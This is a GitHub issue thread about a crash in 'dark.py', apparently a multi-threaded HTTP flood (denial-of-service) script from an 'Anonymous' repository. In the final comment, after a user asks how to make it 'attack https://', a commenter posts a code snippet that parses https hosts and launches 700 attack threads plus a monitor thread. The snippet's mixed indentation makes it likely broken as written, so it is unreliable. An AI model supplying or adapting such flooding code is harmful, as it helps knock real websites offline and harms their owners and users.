### ISSUE TITLE
Trackback (most recent calls last):

### ISSUE THREAD

**Issue by ec1ipc3** [H1R0GH057/Anonymous#35]
Traceback (most recent call last):
  File "dark.py", line 197, in <module>
    host = m.group(1)
AttributeError: 'NoneType' object has no attribute 'group'

I`m using python2 but most of the scripts having same problem

**Comment by swordapi** [comment]
Use python2

**Comment by Lamf4o** [comment]
> Traceback (most recent call last):
> 
>   File "dark.py", line 197, in <module>
> 
>     host = m.group(1)
> 
> AttributeError: 'NoneType' object has no attribute 'group'
> 
> 
> 
> I`m using python2 but most of the scripts having same problem

@wazzer007
The scripts are made for HTTP protocol type sites, none of the scripts here work for HTTPS protocol, so just don't use sites that start with "https://".

- XForWorks ( Retr0 )

**Comment by swordapi** [comment]
Use http:// and python2 always

**Comment by swordapi** [comment]
> > Traceback (most recent call last):
> > 
> >   File "dark.py", line 197, in <module>
> > 
> >     host = m.group(1)
> > 
> > AttributeError: 'NoneType' object has no attribute 'group'
> > 
> > 
> > 
> > I`m using python2 but most of the scripts having same problem
> 
> @wazzer007
> The scripts are made for HTTP protocol type sites, none of the scripts here work for HTTPS protocol, so just don't use sites that start with "https://".
> 
> - XForWorks ( Retr0 )

Is it possible to edit it to attaxk https:// ?

**Comment by Lamf4o** [comment]
Hey @sinaj2889,

Of course, it's possible.
Paste this at the end of the code :

```
url = sys.argv[1]
		if url.count("/")==2:
			url = url + "/"
		m = re.search("http\://([^/]*)/?.*", url)
                m2 = re.search("https\://([^/]*)/?.*", url)
                try:
		    host = m.group(1)
                except:
                    host = m2.group(1)
		for i in range(700):
			t = HTTPThread()
			t.start()
		t = MonitorThread()
		t.start()
```

I hope we helped you, the script just needed some pretty simple editing.
- XForWorks
